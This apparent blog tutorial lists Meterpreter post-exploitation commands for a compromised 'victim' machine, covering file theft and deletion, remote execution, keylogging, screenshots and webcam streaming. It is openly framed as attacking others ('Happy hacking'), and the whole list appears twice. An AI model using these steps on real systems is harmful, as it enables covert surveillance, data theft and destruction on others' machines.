after executing the previous tutorials and establishing a meterpreter session, then the following commands will be helpful to extract information from the victim's computer.
sysinfo - To know details about the target system.
ifconfig - To identify the victim’s IP address.
ls - To list all available files in the current directory
cat - To read the contents of the file.
download - Used to download any file form the victim PC to attacker PC
rm - To delete any file(s)
upload - Used to upload any file form attacker machine to victim machine.
We need to give the complete file path to transfer that file successfully.
background - Used to come out of a valid session without losing it.
We can use sessions –i <ID no> command
To choose a particular session from a list of active sessions.
keyscan_start - To start a passive keylogger on the target machine
keyscan_dump - To get keylogger logs
keyscan_stop - To stop the keylogger
ps - to list running processes and their Process IDs (PIDs)
migrate - Used to jump from one process (PID) to another process
getuid - Used to know userid of the target machine
getpid - Used to know the running process ID (active session)
execute - To execute any executable file like a .exe or .msi on the target machine
screenshot - Used to capture the screen of victim’s machine, the image is saved to root directory in attacker’s machine.
We can turn-on victim’s webcam and stream (live) with webcam_stream command
shell - To enter in to shell or cmd or terminal
In the next tutorial we will show some more tutorials on hacking windows and android over WAN level.
Happy hacking:)
sysinfo - To know details about the target system.
ifconfig - To identify the victim’s IP address.
ls - To list all available files in the current directory
cat - To read the contents of the file.
download - Used to download any file form the victim PC to attacker PC
rm - To delete any file(s)
upload - Used to upload any file form attacker machine to victim machine.
We need to give the complete file path to transfer that file successfully.
background - Used to come out of a valid session without losing it.
We can use sessions –i <ID no> command
To choose a particular session from a list of active sessions.
keyscan_start - To start a passive keylogger on the target machine
keyscan_dump - To get keylogger logs
keyscan_stop - To stop the keylogger
ps - to list running processes and their Process IDs (PIDs)
migrate - Used to jump from one process (PID) to another process
getuid - Used to know userid of the target machine
getpid - Used to know the running process ID (active session)
execute - To execute any executable file like a .exe or .msi on the target machine
screenshot - Used to capture the screen of victim’s machine, the image is saved to root directory in attacker’s machine.
We can turn-on victim’s webcam and stream (live) with webcam_stream command
shell - To enter in to shell or cmd or terminal
In the next tutorial we will show some more tutorials on hacking windows and android over WAN level.
Happy hacking:)
No comments:
Post a Comment